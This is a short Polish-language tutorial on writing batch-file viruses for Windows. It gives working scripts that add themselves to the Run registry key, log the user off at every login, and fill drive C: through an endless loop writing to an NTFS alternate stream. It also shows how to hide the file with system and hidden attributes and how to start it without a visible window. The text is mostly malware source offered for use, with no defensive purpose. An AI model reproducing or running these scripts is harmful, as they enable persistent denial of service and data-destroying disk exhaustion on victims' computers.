Wirusy plików bat
1. Wstępniak
Określenia bat - plik wsadowy run - klucz rejestru (-> punkt 2)
2. Autostart wirusa
Omówie tu tylko jeden ze sposobów, mianowicie rejestr. Są dwa klucze, z którymi startują programy po zalogowaniu:
- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
3. Jak sam bat może dodawać sie do rejestru???
Oto źródło:
-------------------------------------- @echo off echo REGEDIT4>>reg.reg echo. >>reg.reg echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg.reg echo "wirek"="hideex.exe plik.bat">>reg.reg regedit /s reg.reg del reg.reg --------------------------------------
Omówienie: - tworzy plik reg.reg - dodaje go do rejestry - usuwa plik reg.reg
4. Co może nasz wirus???
Bawiąc sie batami zrobiłem 2 wirki:
1. po zalogowaniu wylogowywuje usera
-------------------------------------- @echo off echo REGEDIT4>>reg.reg echo. >>reg.reg echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg.reg echo ""="logoff.exe">>reg.reg regedit /s reg.reg del reg.reg --------------------------------------
Omówienie: - dodaje do run plik logoff.exe
2. zapełnia dysk c:
-------------------------------------- @echo off echo REGEDIT4>>reg.reg echo. >>reg.reg echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg.reg echo ""="%0">>reg.reg regedit /s reg.reg del reg.reg cd c: :go type boot.ini>> boot.ini:str1 goto :go --------------------------------------
Omówienie: - dodaje sie do rejestru - zapisuje plik boot.ini do strumienia, czyli partyca musi być w NTFSie:( ale zamiast "type boot.ini>> boot.ini:str1" możemy "type boot.ini>> wirek.cus"
5. Ukrywanie bata
Ukrycie pliku na dysku
-------------------------------------- attrib +H +S %0 --------------------------------------
"Ukryty" start programu
Dodając wpis do rejestru musimy pamiętać, że jak wida zrestartujemy to po zalogowaniu mignie okienko. Lepiej będzie jak damy jeszcze taki programek jak hideex. Wtedy wpis w rejestrze (wyeksportowany) będzie wyglądał tak:
"wirek"="hideex.exe plik.bat"
przy założeniu, że bedą uruchamiane z c:\windows\system32. Ja wole zamiast "wirek" zostawić "" bo wtedy w rejestrze bedzie to zapisane jako "(Domyślna)".
6. Podsumowanie
Batwirusy mają duże możliwości i działanie wirusa zależy tylko i wyłącznie od zamiarów autora
|